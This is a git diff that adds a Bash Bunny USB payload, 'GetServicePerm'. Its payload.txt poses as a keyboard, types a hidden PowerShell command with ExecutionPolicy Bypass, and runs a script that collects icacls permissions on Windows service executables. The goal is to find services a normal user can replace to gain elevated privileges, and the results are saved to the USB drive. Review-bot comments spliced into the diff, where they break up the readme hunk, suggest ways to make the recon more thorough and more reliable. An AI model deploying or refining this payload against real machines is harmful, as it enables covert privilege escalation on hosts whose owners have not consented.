diff --git a/payloads/library/recon/GetServicePerm/GetServicePerm.ps1 b/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
new file mode 100644
index 00000000..dd3d0eb6
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
@@ -0,0 +1,8 @@
+$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
+
+ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
+$file = $item.ToString($item)
+icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
+}
+
+
diff --git a/payloads/library/recon/GetServicePerm/payload.txt b/payloads/library/recon/GetServicePerm/payload.txt
new file mode 100644
index 00000000..fbc12894
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/payload.txt
@@ -0,0 +1,33 @@
+#!/bin/bash
+#
+# Title: GetServicePerm
+# Author: Resheph @ www.postexplo.com
+# Version: 0.1
+# Target: Microsoft Windows hosts supporting PowerShell
+# Category: Recon
+#
+# Description:
+# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+#
+
+# init
+ATTACKMODE HID STORAGE
+
+GET SWITCH_POSITION
+
+LOOTDIR=/root/udisk/loot/GetServicePerm
+mkdir -p $LOOTDIR
+
+# Do Recon
+LED SETUP
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
+Q ENTER
+
+# Done
+sync;sleep 1;sync
+LED FINISH
diff --git a/payloads/library/recon/GetServicePerm/readme.md b/payloads/library/recon/GetServicePerm/readme.md
new file mode 100644
index 00000000..abbcc07a
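Review bot: The `Select-String -Pattern "system32"` filter and the `.split(' ')[0]` on the icacls line work against the check the header describes: services under system32 are rarely writable by a normal user, while third-party services outside it — the ones most likely to carry weak ACLs — are never examined, and an unquoted PathName with spaces (`C:\Program Files\...`) is cut at the first space so icacls is run on a path that does not exist. Querying `gwmi win32_service` directly and extracting the executable from `PathName` with a regex handles both the quoted and the unquoted form, and writing the service name and `StartName` (the account it runs as) next to each icacls result lets the loot be tied back to a service. Note also that PowerShell does not treat backslash as an escape, so the doubled `\\` in the output path are literal; a quoted string with single backslashes is clearer. If restricting to system32 was intentional, apply `-match 'system32'` to `PathName` rather than to the whole wmic line.
```powershell
$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
$out = "$drive\loot\GetServicePerm\$env:computername.txt"

ForEach ($svc in (gwmi win32_service)) {
    # Quoted PathName: take what is inside the quotes; unquoted: take up to the first ".exe",
    # which keeps paths containing spaces intact instead of cutting at the first space.
    if ($svc.PathName -match '^"([^"]+)"' -or $svc.PathName -match '^(.+?\.exe)') {
        "### $($svc.Name) ($($svc.StartName)) -> $($matches[1])" | Out-File -Append $out
        icacls.exe $matches[1] | Out-File -Append $out
    }
}
```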
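Review bot: `LED FINISH` is signalled immediately after `Q ENTER`, before the host has run a single `icacls`, so a user who unplugs at FINISH takes a partial or empty loot file — the `sync;sleep 1;sync` only flushes writes made on the bunny side, not the host's appends to the exported volume. A conservative wait after the keystrokes, e.g. `sleep 30` before `LED FINISH` (sized to the number of services on a typical target), would make the status LED honest. The `Q DELAY 100` between `Q GUI r` and the typed command is also short for the Run dialog to open on a slow host; `Q DELAY 1000` is a safer default. Minor: quote the variable in `mkdir -p "$LOOTDIR"`.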
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/readme.md
@@ -0,0 +1,25 @@
+# GetServicePerm
+
+* Title: GetServicePerm
+* Author: Resheph @ www.postexplo.com
+* Version: 0.1
+* Target: Microsoft Windows hosts supporting PowerShell
+* Category: Recon
+
+## Description
+
+When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+
+## Configuration
+
+The only thing you will need to change is the Ducky language so it matches the target.
+
+## STATUS
+
+LED SETUP
+LED FINISH
+
+## Discussion
+